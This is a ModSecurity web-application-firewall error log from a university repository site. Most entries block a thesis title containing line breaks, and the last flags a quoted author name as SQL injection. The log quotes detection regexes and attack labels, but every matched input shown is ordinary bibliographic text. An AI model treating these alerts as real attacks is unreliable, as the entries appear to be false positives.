[Mon Aug 28 09:39:22.985785 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI2sCo-f0AAJqS03MAAAAP"]
[Mon Aug 28 09:39:23.214430 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI28Co-f0AAJqS03QAAAAP"]
[Mon Aug 28 09:39:24.466878 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI3MCo-f0AAJqS03UAAAAP"]
[Mon Aug 28 09:39:31.261419 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI48Co-f0AAJpm0XkAAAAE"]
[Mon Aug 28 09:39:31.775215 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI48Co-f0AAJpm0XoAAAAE"]
[Mon Aug 28 09:39:31.949376 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI48Co-f0AAJpm0XsAAAAE"]
[Mon Aug 28 09:39:32.110669 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI5MCo-f0AAJpm0XwAAAAE"]
[Mon Aug 28 09:39:32.281304 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI5MCo-f0AAJpm0X0AAAAE"]
[Mon Aug 28 09:39:32.655873 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI5MCo-f0AAJpm0X4AAAAE"]
[Mon Aug 28 09:39:32.848376 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI5MCo-f0AAJpm0X8AAAAE"]
[Mon Aug 28 09:39:33.496569 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI5cCo-f0AAJpm0YAAAAAE"]
[Mon Aug 28 09:39:33.686369 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI5cCo-f0AAJpm0YEAAAAE"]
[Mon Aug 28 09:39:36.715195 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI6MCo-f0AAJpm0YIAAAAE"]
[Mon Aug 28 09:39:41.653071 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI7cCo-f0AAJpm0YMAAAAE"]
[Mon Aug 28 09:39:41.809411 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI7cCo-f0AAJpm0YQAAAAE"]
[Mon Aug 28 09:39:42.179210 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI7sCo-f0AAJpm0YUAAAAE"]
[Mon Aug 28 09:39:43.755007 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI78Co-f0AAJpm0YYAAAAE"]
[Mon Aug 28 09:39:44.066192 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8MCo-f0AAJpm0YcAAAAE"]
[Mon Aug 28 09:39:44.240335 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8MCo-f0AAJpm0YgAAAAE"]
[Mon Aug 28 09:39:44.388805 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8MCo-f0AAJpm0YkAAAAE"]
[Mon Aug 28 09:39:44.536053 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8MCo-f0AAJpm0YoAAAAE"]
[Mon Aug 28 09:39:44.711222 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8MCo-f0AAJpm0YsAAAAE"]
[Mon Aug 28 09:39:44.871105 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8MCo-f0AAJpm0YwAAAAE"]
[Mon Aug 28 09:39:45.028861 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8cCo-f0AAJpm0Y0AAAAE"]
[Mon Aug 28 09:39:45.520483 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8cCo-f0AAJpm0Y4AAAAE"]
[Mon Aug 28 09:39:46.910057 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI8sCo-f0AAJpm0Y8AAAAE"]
[Mon Aug 28 09:39:47.584671 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI88Co-f0AAJpm0ZAAAAAE"]
[Mon Aug 28 09:39:48.048421 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI9MCo-f0AAJpm0ZEAAAAE"]
[Mon Aug 28 09:39:48.424026 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI9MCo-f0AAJpm0ZIAAAAE"]
[Mon Aug 28 09:39:48.640117 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI9MCo-f0AAJpm0ZMAAAAE"]
[Mon Aug 28 09:39:49.096023 2023] [:error] [pid 39526] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI9cCo-f0AAJpm0ZQAAAAE"]
[Mon Aug 28 09:40:21.174893 2023] [:error] [pid 39447] [client 47.128.23.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Handika Satria Perlambang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwJFcCo-f0AAJoXpcwAAAAO"]
